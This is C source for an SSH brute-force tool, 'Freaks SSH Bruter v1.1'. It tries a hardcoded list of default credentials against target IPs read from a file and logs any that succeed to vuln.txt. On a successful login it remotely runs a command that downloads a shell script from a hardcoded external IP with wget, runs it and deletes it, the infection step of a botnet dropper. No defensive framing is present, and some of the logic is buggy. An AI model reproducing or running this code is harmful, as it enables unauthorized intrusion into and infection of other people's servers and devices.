/* * cp /usr/local/lib/libssh.so /usr/lib/ * * gcc -o update update.c -I /usr/local/include -L /usr/local/lib/ -lssh -lpthread * */ #include #include #include #include #include #include #include #include #include #include #include #define NORM "\033[00;00m" #define ALBASTRU "\033[01;34m" int test_pass(char *user, char *password, char *host) { ssh_session my_ssh_session; ssh_channel channel; int rc; // Open session and set options my_ssh_session = ssh_new(); if (my_ssh_session == NULL) return -1; ssh_options_set(my_ssh_session, SSH_OPTIONS_HOST, host); ssh_options_set(my_ssh_session, SSH_OPTIONS_USER, user); // Connect to server rc = ssh_connect(my_ssh_session); if (rc != SSH_OK) { ssh_get_error(my_ssh_session); ssh_free(my_ssh_session); return -1; } // Authenticate ourselves rc = ssh_userauth_password(my_ssh_session, NULL, password); if (rc != SSH_AUTH_SUCCESS) { ssh_get_error(my_ssh_session); ssh_disconnect(my_ssh_session); ssh_free(my_ssh_session); exit(-1); } else { channel = ssh_channel_new(my_ssh_session); if (channel == NULL) return SSH_ERROR; rc = ssh_channel_open_session(channel); if (rc != SSH_OK) { rc = ssh_channel_request_exec(channel, "cd /tmp; wget http://185.10.68.196/update.sh; busybox wget http://185.10.68.196/update.sh; chmod 777 update.sh; sh update.sh; rm -f update.sh"); if (rc != SSH_OK) { return 1; } } } ssh_disconnect(my_ssh_session); ssh_free(my_ssh_session); } void checkauth(char *user, char *password, char *host) { struct sockaddr_in addr_s; struct hostent *hp; struct in_addr *myaddr; FILE *vulnf; short int fd=-1; fd_set fdset; struct timeval tv; int rc; int so_error; socklen_t len; struct timespec tstart={0,0}, tend={0,0}; int seconds = 1; password[strlen(password)-1] = 0; host[strlen(host)-1] = 0; addr_s.sin_family = AF_INET; // utilizzo IPv4 addr_s.sin_addr.s_addr = inet_addr(host); addr_s.sin_port = htons(22); clock_gettime(CLOCK_MONOTONIC, &tstart); fd = socket(AF_INET, SOCK_STREAM, 0); fcntl(fd, F_SETFL, O_NONBLOCK); // setup non blocking socket // make the connection rc = connect(fd, (struct sockaddr *)&addr_s, sizeof(addr_s)); if ((rc == -1) && (errno != EINPROGRESS)) { close(fd); return; } FD_ZERO(&fdset); FD_SET(fd, &fdset); tv.tv_sec = seconds; tv.tv_usec = 0; rc = select(fd + 1, NULL, &fdset, NULL, &tv); switch(rc) { case 1: // data to read len = sizeof(so_error); getsockopt(fd, SOL_SOCKET, SO_ERROR, &so_error, &len); if (so_error == 0) { clock_gettime(CLOCK_MONOTONIC, &tend); } else { // error return; } break; case 0: //timeout return; } close(fd); if(test_pass(user, password, host)) { myaddr=(struct in_addr*)malloc(sizeof(struct in_addr)); myaddr->s_addr=inet_addr(host); hp = gethostbyaddr((char *) myaddr,4,AF_INET); if((hp!=NULL)){ vulnf=fopen("vuln.txt","a+"); fprintf(vulnf,"%s:%s:%s\n",user,password,hp->h_name); printf("\nFreaks next root -> %s:%s:%s -> %s\n",user,password,host,hp->h_name); } else { vulnf=fopen("vuln.txt","a+"); fprintf(vulnf,"%s:%s:%s\n",user,password,host); printf("\nFreaks next root -> %s:%s:%s -> Can't resolve DNS\n",user,password,host); } } } int main(int argc, char **argv) { FILE *fp, *vulnf; char *c; char buff[4096]; int i; int numforks,maxf; char *combos[28][2]; combos[0][0] = "root"; combos[0][1] = "root"; combos[1][0] = "root"; combos[1][1] = "admin"; combos[2][0] = "root"; combos[2][1] = "password"; combos[3][0] = "root"; combos[3][1] = "default"; combos[4][0] = "root"; combos[4][1] = "toor"; combos[5][0] = "admin"; combos[5][1] = "admin"; combos[6][0] = "admin"; combos[6][1] = "1234"; combos[7][0] = "admin"; combos[7][1] = "12345"; combos[8][0] = "admin"; combos[8][1] = "password"; combos[9][0] = "ubnt"; combos[9][1] = "ubnt"; combos[10][0] = "vagrant"; combos[10][1] = "vagrant"; combos[11][0] = "test"; combos[11][1] = "test"; combos[12][0] = "root"; combos[12][1] = "ubnt"; combos[13][0] = "telnet"; combos[13][1] = "telnet"; combos[14][0] = "guest"; combos[14][1] = "guest"; combos[15][0] = "root"; combos[15][1] = "vagrant"; combos[16][0] = "default"; combos[16][1] = ""; combos[17][0] = "cisco"; combos[17][1] = "cisco"; combos[18][0] = "root"; combos[18][1] = "5up"; combos[19][0] = "user"; combos[19][1] = "password"; combos[20][0] = "user"; combos[20][1] = "user"; combos[21][0] = "root"; combos[21][1] = "debian"; combos[22][0] = "root"; combos[22][1] = "alpine"; combos[23][0] = "root"; combos[23][1] = "ceadmin"; combos[24][0] = "root"; combos[24][1] = "indigo"; combos[25][0] = "root"; combos[25][1] = "linux"; combos[26][0] = "root"; combos[26][1] = "rootpasswd"; combos[27][0] = "root"; combos[27][1] = "timeserver"; struct hostent *hp; struct in_addr *myaddr; if((fp=fopen("mfu.txt","r"))==NULL) exit(printf("\e[1;31mFATAL: I can't open mfu.txt\n"NORM)); printf("\e[1;31mFreaks SSH Bruter v1.1 \e[00;00m- \e[1;32m\n"NORM); maxf=atoi(argv[1]); while(fgets(buff,sizeof(buff),fp)) { c=strchr(buff,'n'); if(c!=NULL) *c='.'; if (!(fork())) { // printf("--> Atacare %s",buff); for(i = 0; i < 27; i++) { buff[strlen(buff)-1] = 0; if(test_pass(combos[i][0], combos[i][0], buff)) { myaddr=(struct in_addr*)malloc(sizeof(struct in_addr)); myaddr->s_addr=inet_addr(buff); hp = gethostbyaddr((char *) myaddr,4,AF_INET); if((hp!=NULL)){ vulnf=fopen("vuln.txt","a+"); fprintf(vulnf,"%s:%s:%s\n", combos[i][0], combos[i][1], hp->h_name); printf("Freaks next root -> %s:%s:%s -> %s\n", combos[i][0], combos[i][1], buff, hp->h_name); } else { vulnf=fopen("vuln.txt","a+"); fprintf(vulnf,"%s:%s:%s\n", combos[i][0], combos[i][1], buff); printf("Freaks next root -> %s:%s:%s -> Can't resolve DNS\n", combos[i][0], combos[i][1], buff); } break; } } exit(0); } else { numforks++; if (numforks > maxf) for (numforks; numforks > maxf; numforks--) wait(NULL); } } }